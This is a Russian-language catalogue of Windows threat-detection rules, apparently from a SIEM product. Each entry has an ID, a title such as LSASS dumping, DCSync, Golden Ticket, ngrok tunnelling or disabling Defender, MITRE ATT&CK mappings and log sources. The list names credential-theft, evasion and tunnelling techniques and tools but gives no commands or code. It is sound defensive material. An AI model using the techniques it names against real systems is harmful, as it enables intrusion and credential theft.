TrackBackupCrypto.xel

Microsoft

Windows

RV-D-88

Изменение запланированной задачи в групповой политике

TA0005 (Defense Evasion), TA0004 (Privilege Escalation)

T1484 (Domain or Tenant Policy Modification), T1484.001 (Domain or Tenant Policy Modification: Group Policy Modification)

Security

Microsoft

Windows

RV-D-230

Сжатие дамп-файлов средствами 7Zip

TA0009 (Collection)

T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)

Security, Sysmon

Microsoft

Windows

RV-D-231

Сжатие дамп-файлов средствами WinRAR

TA0009 (Collection)

T1560 (Archive Collected Data), T1560.001 (Archive Collected Data: Archive via Utility)

Security, Sysmon

Microsoft

Windows

RV-D-232

Использование утилит для создания снимков экрана

TA0009 (Collection)

T1113 (Screen Capture)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-233

Запросы к API Telegram подозрительным процессом

TA0011 (Command and Control)

T1102 (Web Service), T1102.002 (Web Service: Bidirectional Communication), T1567 (Exfiltration Over Web Service)

Sysmon

Microsoft

Windows

RV-D-234

Загрузка файлов с веб-ресурсов стандартными утилитами

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-235

Туннелирование с использованием ngrok

TA0011 (Command and Control)

T1090 (Proxy), T1090.002 (Proxy: External Proxy), T1102 (Web Service), T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-236

Использование DNS туннеля

TA0011 (Command and Control)

Sysmon

Microsoft

Windows

RV-D-237

Использование Replace.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-238

Установлено ПО для удаленного доступа

TA0011 (Command and Control), TA0008 (Lateral Movement), TA0003 (Persistence)

T1021 (Remote Services), T1021.005 (Remote Services: VNC), T1133 (External Remote Services), T1219 (Remote Access Tools), T1219.002 (Remote Access Tools: Remote Desktop Software)

Security

Microsoft

Windows

RV-D-239

RDP подключение с использованием туннеля

TA0011 (Command and Control)

T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-240

Использование утилиты gs-netcat из набора инструментов gsocket

TA0011 (Command and Control)

T1090 (Proxy), T1090.002 (Proxy: External Proxy), T1572 (Protocol Tunneling)

Security, Sysmon

Microsoft

Windows

RV-D-241

Зафиксирована атака типа AS-REP Roasting

TA0005 (Defense Evasion), TA0003 (Persistence), TA0004 (Privilege Escalation), TA0001 (Initial Access)

T1078 (Valid Accounts), T1078.002 (Valid Accounts: Domain Accounts), T1110 (Brute Force), T1110.002 (Brute Force: Password Cracking), T1558 (Steal or Forge Kerberos Tickets), T1558.004 (Steal or Forge Kerberos Tickets: AS-REP Roasting)

Security

Microsoft

Windows

RV-D-242

Копирование веток реестра, содержащих хеши паролей

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.002 (OS Credential Dumping: Security Account Manager), T1003.004 (OS Credential Dumping: LSA Secrets)

Security

Microsoft

Windows

RV-D-243

Атака DCSync

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.006 (OS Credential Dumping: DCSync)

Security

Microsoft

Windows

RV-D-244

Зафиксирована атака Golden Ticket

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-245

Обнаружено создание билета TGT при помощи хакерской утилиты

TA0006 (Credential Access)

T1558 (Steal or Forge Kerberos Tickets), T1558.001 (Steal or Forge Kerberos Tickets: Golden Ticket)

Sysmon

Microsoft

Windows

RV-D-246

Попытка дампа процесса LSASS с помощью comsvcs.dll

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Security

Microsoft

Windows

RV-D-247

Дамп LSASS с помощью Python-утилит

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Sysmon

Microsoft

Windows

RV-D-248

Попытка дампа процесса LSASS с помощью утилиты Procdump

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Security, Sysmon

Microsoft

Windows

RV-D-249

Попытка дампа процесса LSASS c помощью утилиты HandleKatz

TA0002 (Execution), TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1106 (Native API)

Sysmon

Microsoft

Windows

RV-D-250

Получение информации о службе RDP через sc.exe

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Security, Sysmon

Microsoft

Windows

RV-D-251

Обнаружена попытка дампа NTDS.dit

TA0005 (Defense Evasion), TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.003 (OS Credential Dumping: NTDS), T1006 (Direct Volume Access)

Security, Sysmon, PowerShell

Microsoft

Windows

RV-D-252

Атака Password Spraying

TA0006 (Credential Access)

T1110 (Brute Force), T1110.003 (Brute Force: Password Spraying), T1110.004 (Brute Force: Credential Stuffing)

Security

Microsoft

Windows

RV-D-253

Захват учетных данных с помощью Rpcping.exe

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Security, Sysmon

Microsoft

Windows

RV-D-254

Подозрительный снэпшот базы данных Active Directory средствами ADExplorer

TA0006 (Credential Access)

T1552 (Unsecured Credentials), T1552.001 (Unsecured Credentials: Credentials In Files), T1552.003 (Unsecured Credentials: Bash History)

Security, Sysmon

Microsoft

Windows

RV-D-255

Поиск процессов с уязвимыми модулями

TA0006 (Credential Access), TA0007 (Discovery)

T1003 (OS Credential Dumping), T1057 (Process Discovery)

Security, Sysmon

Microsoft

Windows

RV-D-256

Зафиксировано использование утилиты RDPStrike

TA0006 (Credential Access), TA0009 (Collection)

T1055 (Process Injection), T1055.001 (Process Injection: Dynamic-link Library Injection), T1056 (Input Capture), T1056.004 (Input Capture: Credential API Hooking), T1212 (Exploitation for Credential Access)

Sysmon

Microsoft

Windows

RV-D-257

Возможно успешный подбор пароля пользователя

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-258

Подозрительный доступ к файлу NTDS.dit

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.003 (OS Credential Dumping: NTDS)

Security

Microsoft

Windows

RV-D-259

Чтение процесса LSASS от подозрительного процесса

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Security

Microsoft

Windows

RV-D-260

Подозрительный доступ к памяти процесса LSASS

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Sysmon

Microsoft

Windows

RV-D-261

Дамп LSASS с помощью Диспетчера задач

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory)

Sysmon

Microsoft

Windows

RV-D-262

Подбор пароля учетной записи на хосте

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-263

Множественные неудачные попытки аутентификации учетной записи

TA0006 (Credential Access)

T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-264

Перечисление учетных записей в домене методом перебора

TA0006 (Credential Access)

T1087 (Account Discovery), T1087.002 (Account Discovery: Domain Account), T1110 (Brute Force), T1110.001 (Brute Force: Password Guessing)

Security

Microsoft

Windows

RV-D-265

Запуск aspnet_compiler.exe для компиляции приложения в нетипичной директории

TA0005 (Defense Evasion)

T1127 (Trusted Developer Utilities Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-266

Отключение или модификация Windows Audit Log Policy

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

Security, Sysmon

Microsoft

Windows

RV-D-267

Журнал событий Windows был очищен

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.001 (Indicator Removal: Clear Windows Event Logs)

Security, System

Microsoft

Windows

RV-D-268

Обход UAC с помощью реестра

TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control)

Sysmon

Microsoft

Windows

RV-D-269

Кодирование в Base64 файла в подозрительном каталоге с помощью Certutil

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information)

Security, Sysmon

Microsoft

Windows

RV-D-270

Кодирование файла в Base64 с помощью Certutil

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information)

Security, Sysmon

Microsoft

Windows

RV-D-271

Загрузка модуля в процесс cmstp из нестандартного пути

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.003 (System Binary Proxy Execution: CMSTP)

Sysmon

Microsoft

Windows

RV-D-272

Загрузка процессом cmstp модулей для выполнения скриптов

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.003 (System Binary Proxy Execution: CMSTP)

Sysmon

Microsoft

Windows

RV-D-273

Отключение CrashDump через изменение ветки реестра

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-274

Удаленное создание потока процессом, расположенным в подозрительном месте

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-275

Атака DCShadow

TA0005 (Defense Evasion)

T1207 (Rogue Domain Controller)

Security

Microsoft

Windows

RV-D-276

Отключение или модификация Windows Defender

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

PowerShell, Security, Sysmon, System

Microsoft

Windows

RV-D-277

Отключение ETW провайдера Windows Defender

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-278

Отключение или модификация Defender Firewall

TA0005 (Defense Evasion)

T1562.004 (Impair Defenses: Disable or Modify System Firewall)

Security, Sysmon

Microsoft

Windows

RV-D-279

Изменение политик Windows Defender Firewall

TA0005 (Defense Evasion)

T1562.004 (Impair Defenses: Disable or Modify System Firewall)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-280

Отключение ETW провайдера .NET

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-281

Отключение службы Windows EventLog

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-282

Отключение сбора событий EventLog через реестр

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

Security, Sysmon

Microsoft

Windows

RV-D-283

Создание и удаление файла за короткий промежуток времени при помощи интерпретатора командной строки

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.004 (Indicator Removal: File Deletion), T1071.002 (Application Layer Protocol: File Transfer Protocols)

Sysmon

Microsoft

Windows

RV-D-284

Запуск файла с двойным расширением

TA0005 (Defense Evasion), TA0002 (Execution)

T1036 (Masquerading), T1036.007 (Masquerading: Double File Extension), T1204 (User Execution), T1204.002 (User Execution: Malicious File)

Security, Sysmon

Microsoft

Windows

RV-D-285

Запуск файла без расширения

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.008 (Masquerading: Masquerade File Type)

Security, Sysmon

Microsoft

Windows

RV-D-286

Эксплуатация утилиты GrimResource

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.014 (System Binary Proxy Execution: MMC)

Security, Sysmon

Microsoft

Windows

RV-D-287

Отключение логирования событий IIS

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-288

Загрузка DLL системным процессом из подозрительного места

TA0005 (Defense Evasion)

T1070 (Indicator Removal)

Sysmon

Microsoft

Windows

RV-D-289

Неподписанная DLL загружена утилитой Windows

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-290

Загрузка файлов с использованием LOLBins InstallUtil.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.004 (System Binary Proxy Execution: InstallUtil)

Security, Sysmon

Microsoft

Windows

RV-D-291

Использование ветки реестра Provisioning_Commands для маскировки запуска программ

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Sysmon

Microsoft

Windows

RV-D-292

Загрузка модуля в процесс mmc из нестандартного пути

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.014 (System Binary Proxy Execution: MMC)

Sysmon

Microsoft

Windows

RV-D-293

Изменение чувствительных значений реестра, предназначенных для ухода от обнаружения

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-294

Загрузка процессом mshta модулей для выполнения скриптов

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.005 (System Binary Proxy Execution: Mshta)

Sysmon

Microsoft

Windows

RV-D-295

Сетевое подключение из подозрительной директории

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Sysmon

Microsoft

Windows

RV-D-296

Создание сетевого подключения процессом Winlogon

TA0005 (Defense Evasion), TA0002 (Execution), TA0011 (Command and Control)

T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-297

Загрузка модуля в процесс odbcconf из нестандартного пути

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.008 (System Binary Proxy Execution: Odbcconf)

Sysmon

Microsoft

Windows

RV-D-298

Запуск потенциально поддельного экземпляра hxtsr.exe

TA0005 (Defense Evasion)

T1036 (Masquerading)

Security, Sysmon

Microsoft

Windows

RV-D-299

Использование устаревшей версии PowerShell v2

TA0005 (Defense Evasion)

T1562.010 (Impair Defenses: Downgrade Attack)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-300

Отключение ETW провайдера PowerShell

TA0005 (Defense Evasion)

T1562.006 (Impair Defenses: Indicator Blocking)

Security, Sysmon

Microsoft

Windows

RV-D-301

Запуск процесса AddinUtil.exe из подозрительной директории.

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-302

Необычное выполнение приложений через AtBroker.EXE

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-303

Установка root сертификата средствами CertMgr.exe

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)

Security, Sysmon

Microsoft

Windows

RV-D-304

Скачивание файлов с IP-адреса через CertOC.EXE

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-305

Подозрительная DDL загружена средствами CertOC.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-306

Новый сертификат root был установлен средствами Certutil.exe

TA0005 (Defense Evasion)

T1553 (Subvert Trust Controls), T1553.004 (Subvert Trust Controls: Install Root Certificate)

Security, Sysmon

Microsoft

Windows

RV-D-307

Потенциально вредоносное использование элементов панели управления.

TA0005 (Defense Evasion), TA0002 (Execution), TA0003 (Persistence)

T1218 (System Binary Proxy Execution), T1218.002 (System Binary Proxy Execution: Control Panel), T1546 (Event Triggered Execution)

Security, Sysmon

Microsoft

Windows

RV-D-308

Скачивание файлов через IMEWDBLD.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-309

Дамп памяти процесса средствами Dotnet-Dump

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-310

Попытка дампа оперативной памяти с помощью RdrLeakDiag.exe

TA0005 (Defense Evasion)

T1036 (Masquerading), T1036.001 (Masquerading: Invalid Code Signature)

Security, Sysmon

Microsoft

Windows

RV-D-311

Скачивание файла средствами MpCmpRun.EXE

TA0005 (Defense Evasion), TA0011 (Command and Control)

T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-312

Запуск подозрительного cab файла через msdt.exe

TA0005 (Defense Evasion)

T1202 (Indirect Command Execution)

Security, Sysmon

Microsoft

Windows

RV-D-313

Скачивание файлов через msedge_proxy.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-314

Вызов функции DllUnregisterServer через Msiexec.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)

Security, Sysmon

Microsoft

Windows

RV-D-315

Запуск произвольной DLL библиотеки средствами Msiexec.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.007 (System Binary Proxy Execution: Msiexec)

Security, Sysmon

Microsoft

Windows

RV-D-316

Скачивание файлов через PresentationHost.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-317

Скачивание файла средствами ProtocolHandler

TA0005 (Defense Evasion), TA0011 (Command and Control)

T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-318

Отключение снапшотов томов

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Security, Sysmon

Microsoft

Windows

RV-D-319

Защита от записи для хранилища отключена

TA0005 (Defense Evasion)

Security, Sysmon

Microsoft

Windows

RV-D-320

Подозрительное выполнение Regasm/Regsvcs с нестандартным расширением

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution), T1218.009 (System Binary Proxy Execution: Regsvcs/Regasm)

Security, Sysmon

Microsoft

Windows

RV-D-321

Импорт ключа реестра из ADS

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Security, Sysmon

Microsoft

Windows

RV-D-322

Скачивание файлов через Squirrel.exe

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-323

Скачивание файлов средствами MS-AppInstaller

TA0011 (Command and Control)

T1105 (Ingress Tool Transfer)

Security, Sysmon

Microsoft

Windows

RV-D-324

Дамп памяти ядра через LiveKD

TA0006 (Credential Access)

T1003 (OS Credential Dumping)

Security, Sysmon

Microsoft

Windows

RV-D-325

Создание нового процесса с помощью Taskmgr.exe

TA0005 (Defense Evasion)

T1036 (Masquerading)

Security, Sysmon

Microsoft

Windows

RV-D-326

Необычный аргумент или дочерний процесс Wlrmdr.exe

TA0005 (Defense Evasion)

T1218 (System Binary Proxy Execution)

Security, Sysmon

Microsoft

Windows

RV-D-327

Подозрительный агент обновления Windows

TA0005 (Defense Evasion)

T1036 (Masquerading)

Security, Sysmon

Microsoft

Windows

RV-D-328

Изменение чувствительных параметров RDP

TA0005 (Defense Evasion), TA0003 (Persistence)

T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-329

Порт RDP по умолчанию изменен на нестандартный

TA0005 (Defense Evasion)

T1547 (Boot or Logon Autostart Execution), T1547.010 (Boot or Logon Autostart Execution: Port Monitors)

Sysmon

Microsoft

Windows

RV-D-330

Изменена очередь загрузки драйвера Sysmon

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-331

Изменение разрешения доступа к каналу Winevt через реестр.

TA0005 (Defense Evasion)

T1562.002 (Impair Defenses: Disable Windows Event Logging)

Sysmon

Microsoft

Windows

RV-D-332

Отключение в реестре HECI

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-333

Отключение Административных общих ресурсов при запуске.

TA0005 (Defense Evasion)

T1070 (Indicator Removal), T1070.005 (Indicator Removal: Network Share Connection Removal)

Sysmon

Microsoft

Windows

RV-D-334

Отключение Privacy Settings Experience в реестре.

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-335

Отключение контроль учетных записей пользователей (UAC) в реестре.

TA0004 (Privilege Escalation), TA0005 (Defense Evasion)

T1548 (Abuse Elevation Control Mechanism), T1548.002 (Abuse Elevation Control Mechanism: Bypass User Account Control)

Sysmon

Microsoft

Windows

RV-D-336

Включение в реестре DNS-over-HTTPS.

TA0005 (Defense Evasion)

T1112 (Modify Registry), T1490 (Inhibit System Recovery)

Sysmon

Microsoft

Windows

RV-D-337

Установка нового значения DNS ServerLevelPluginDll

TA0005 (Defense Evasion)

T1112 (Modify Registry), T1574 (Hijack Execution Flow), T1574.002 (DLL Side-Loading)

Sysmon

Microsoft

Windows

RV-D-338

Подозрительная модификация ключей реестра COM/WMI

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-339

Модификация скрытых ключей Проводника

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Sysmon

Microsoft

Windows

RV-D-340

Скрытие задачи по расписанию с помощью Index Value Tamper

TA0005 (Defense Evasion)

T1564 (Hide Artifacts), T1564.001 (Hide Artifacts: Hidden Files and Directories)

Sysmon

Microsoft

Windows

RV-D-341

Подозрительный путь в значении реестра Keyboard Layout IME

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

Sysmon

Microsoft

Windows

RV-D-342

Включение хранение хеша LM

TA0005 (Defense Evasion)

T1112 (Modify Registry)

Sysmon

Microsoft

Windows

RV-D-343

Загрузка модуля в процесс regsvr32 из нестандартного пути

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32)

Sysmon

Microsoft

Windows

RV-D-344

Выполнение скриптов через regsvr32

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.010 (System Binary Proxy Execution: Regsvr32)

Sysmon

Microsoft

Windows

RV-D-345

Загрузка модуля в процесс rundll32 из нестандартного пути

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-346

Загрузка процессом rundll32 модулей для выполнения скриптов

TA0005 (Defense Evasion), TA0002 (Execution)

T1129 (Shared Modules), T1218 (System Binary Proxy Execution), T1218.011 (System Binary Proxy Execution: Rundll32)

Sysmon

Microsoft

Windows

RV-D-347

Ослабление защиты или мониторинга системы

TA0005 (Defense Evasion)

T1562.001 (Impair Defenses: Disable or Modify Tools)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-348

Закрепление через ключ реестра ReflectDebugger утилиты WerFault

TA0005 (Defense Evasion), TA0003 (Persistence)

T1036 (Masquerading), T1036.003 (Masquerading: Rename Legitimate Utilities), T1112 (Modify Registry)

Security, Sysmon

Microsoft

Windows

RV-D-349

Обнаружен запуск XSL скрипта

TA0005 (Defense Evasion)

T1220 (XSL Script Processing)

Security, Sysmon

Microsoft

Windows

RV-D-350

Зафиксирована разведка учетных записей

TA0007 (Discovery)

T1059 (Command and Scripting Interpreter), T1087 (Account Discovery), T1087.001 (Account Discovery: Local Account), T1087.002 (Account Discovery: Domain Account)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-351

Разведка системы при помощи WMI

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)

Security

Microsoft

Windows

RV-D-352

Разведка процессов

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1592 (Gather Victim Host Information), T1592.002 (Gather Victim Host Information: Software)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-353

Разведка доменных трастов

TA0002 (Execution), TA0007 (Discovery)

T1059 (Command and Scripting Interpreter), T1482 (Domain Trust Discovery), T1590 (Gather Victim Network Information), T1590.003 (Gather Victim Network Information: Network Trust Dependencies)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-354

Зафиксировано изучение общих сетевых ресурсов

TA0007 (Discovery)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-355

Выполнение Sysinternals PsSuspend

TA0007 (Discovery), TA0003 (Persistence)

T1543 (Create or Modify System Process), T1543.003 (Create or Modify System Process: Windows Service)

Security, Sysmon

Microsoft

Windows

RV-D-356

Перечисление ключей реестра для разведки

TA0007 (Discovery)

T1012 (Query Registry)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-357

Перечисление ключей реестра, которые могут быть интересны при разведке

TA0007 (Discovery)

T1012 (Query Registry)

Security

Microsoft

Windows

RV-D-358

Выполнение разведки удаленных систем

TA0007 (Discovery)

T1018 (Remote System Discovery), T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-359

Изучение конфигурации локальной системы

TA0007 (Discovery)

T1047 (Windows Management Instrumentation), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell), T1082 (System Information Discovery), T1592 (Gather Victim Host Information), T1592.004 (Gather Victim Host Information: Client Configurations)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-360

Сбор информации о сетевых подключениях

TA0007 (Discovery)

T1049 (System Network Connections Discovery), T1059.001 (Command and Scripting Interpreter: PowerShell), T1059.003 (Command and Scripting Interpreter: Windows Command Shell)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-361

Зафиксировано изучение системного времени

TA0007 (Discovery)

PowerShell, Security, Sysmon

Microsoft

Windows

RV-D-362

Запуск whoami с правами системы

TA0007 (Discovery)

T1033 (System Owner/User Discovery)

Security, Sysmon

Microsoft

Windows

RV-D-363

Запуск интерпретатора командной строки от WinRAR

TA0002 (Execution), TA0005 (Defense Evasion)

T1027.015 (Obfuscated Files or Information: Compression), T1203 (Exploitation for Client Execution)

Security, Sysmon

Microsoft

Windows

RV-D-364

Эксплуатация уязвимости CVE-2023-46944 в расширении GitLens для VSCode на Windows

TA0002 (Execution)

T1203 (Exploitation for Client Execution)

Security, Sysmon

Microsoft

Windows

RV-D-365

Зафиксировано использование хакерской утилиты DSInternals

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1201 (Password Policy Discovery), T1484 (Domain or Tenant Policy Modification), T1558 (Steal or Forge Kerberos Tickets)

PowerShell

Microsoft

Windows

RV-D-366

Зафиксировано использование хакерской утилиты nishang

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1003.002 (OS Credential Dumping: Security Account Manager), T1005 (Data from Local System), T1027 (Obfuscated Files or Information), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1041 (Exfiltration Over C2 Channel), T1046 (Network Service Discovery), T1056 (Input Capture), T1056.001 (Input Capture: Keylogging), T1056.002 (Input Capture: GUI Input Capture), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1082 (System Information Discovery), T1087 (Account Discovery), T1102 (Web Service), T1105 (Ingress Tool Transfer), T1218 (System Binary Proxy Execution), T1218.004 (System Binary Proxy Execution: InstallUtil), T1218.011 (System Binary Proxy Execution: Rundll32), T1547 (Boot or Logon Autostart Execution), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), T1564 (Hide Artifacts), T1564.004 (Hide Artifacts: NTFS File Attributes), T1566 (Phishing)

PowerShell

Microsoft

Windows

RV-D-367

Зафиксировано использование хакерской утилиты OWA-Toolkit

TA0002 (Execution)

T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1114 (Email Collection), T1133 (External Remote Services), T1560 (Archive Collected Data)

PowerShell

Microsoft

Windows

RV-D-368

Зафиксировано использование хакерской утилиты PowerShell-Suit

TA0006 (Credential Access)

T1003 (OS Credential Dumping), T1003.001 (OS Credential Dumping: LSASS Memory), T1021 (Remote Services), T1021.006 (Remote Services: Windows Remote Management), T1057 (Process Discovery), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

PowerShell

Microsoft

Windows

RV-D-369

Зафиксировано использование хакерской утилиты PowerShellArsenal

TA0006 (Credential Access)

PowerShell

Microsoft

Windows

RV-D-370

Загрузка файлов с удаленного сервера при помощи PowerShell

TA0008 (Lateral Movement)

T1021 (Remote Services), T1021.004 (Remote Services: SSH), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell), T1105 (Ingress Tool Transfer), T1566 (Phishing), T1566.002 (Phishing: Spearphishing Link)

PowerShell

Microsoft

Windows

RV-D-371

Зафиксировано возможное использование обфускации Powesrhell

TA0005 (Defense Evasion)

T1027 (Obfuscated Files or Information), T1027.010 (Obfuscated Files or Information: Command Obfuscation), T1027.015 (Obfuscated Files or Information: Compression), T1059 (Command and Scripting Interpreter), T1059.001 (Command and Scripting Interpreter: PowerShell)

PowerShell

Microsoft

Windows

RV-D-372

